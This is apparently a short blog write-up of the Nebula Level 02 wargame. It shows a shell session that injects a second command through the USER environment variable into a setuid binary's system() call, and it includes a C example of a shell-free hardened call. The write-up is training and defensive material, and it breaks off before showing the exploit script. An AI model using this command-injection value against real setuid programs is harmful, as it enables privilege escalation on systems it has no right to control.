After completing Nebula Level 01, I decided to quickly run into Nebula Level 02. After quickly looking at the code they have provided, it became evident that Level01 and Level02 were very similar, just different in the way you launch the exploit. Level01 was exploited by having a script with the same name as the binary that was being called. In this exploit you want to use the USER variable and assign the code you want to run to it.
Here is what I did to accomplish this exploit:
flag02@nebula:~$ pwd
/home/level02
level02@nebula:~$ chmod g+x exploit
level02@nebula:~$ USER='-e "I am going to get the flag"; ~/exploit'
level02@nebula:~$ /home/flag02/flag02
about to call system("/bin/echo -e "I am going to get the flag"; ~/exploit is cool")
I am going to get the flag
flag02@nebula:~$ getflag
You have successfully executed getflag on a target account
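The "about to call system(...)" line shows the USER value being spliced into a shell command string, which is why the `;` starts a second command. As an added example (not code from the original post or from the Nebula level), here is the hardened form of that call: the value is passed as a single argv entry to `/bin/echo`, so no shell ever parses it. The function name `echo_user_noshell` is hypothetical, and the sketch assumes `/bin/echo` exists.

```c
#include <stdio.h>
#include <string.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/wait.h>

/* Constructed sample: the USER value from the session above. */
static const char *SAMPLE_USER = "-e \"I am going to get the flag\"; ~/exploit";

/* Hardened form: run /bin/echo with an argv array, so no shell ever parses
 * the value and ';' has no special meaning. Captures stdout into out and
 * returns the child's exit status, or -1 on error. */
int echo_user_noshell(const char *user, char *out, size_t outlen)
{
    int fds[2];
    if (outlen == 0 || pipe(fds) != 0) return -1;

    pid_t pid = fork();
    if (pid < 0) { close(fds[0]); close(fds[1]); return -1; }
    if (pid == 0) {                       /* child: stdout -> pipe */
        dup2(fds[1], STDOUT_FILENO);
        close(fds[0]); close(fds[1]);
        char *argv[] = { "echo", (char *)user, "is", "cool", NULL };
        char *envp[] = { NULL };          /* empty environment for the child */
        execve("/bin/echo", argv, envp);
        _exit(127);                       /* exec failed */
    }
    close(fds[1]);
    size_t used = 0; ssize_t n;
    while (used < outlen - 1 &&
           (n = read(fds[0], out + used, outlen - 1 - used)) > 0)
        used += (size_t)n;
    out[used] = '\0';
    close(fds[0]);

    int status;
    if (waitpid(pid, &status, 0) < 0 || !WIFEXITED(status)) return -1;
    return WEXITSTATUS(status);
}

int main(void)
{
    char out[256];
    int rc = echo_user_noshell(SAMPLE_USER, out, sizeof out);
    printf("exit=%d output=%s", rc, out);
    return rc;
}
```

With the sample value, the whole string comes back as literal text and `~/exploit` is never run. A value that is exactly an echo option such as `-n` is still read by echo as an option, so validate the value as well if that matters.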
I’m now going to move on to Nebula Level 03 when I get a chance.
Note: Not sure why the cat of exploit didn’t show (probably issues with wp-syntax and my theme), but exploit was just a script with :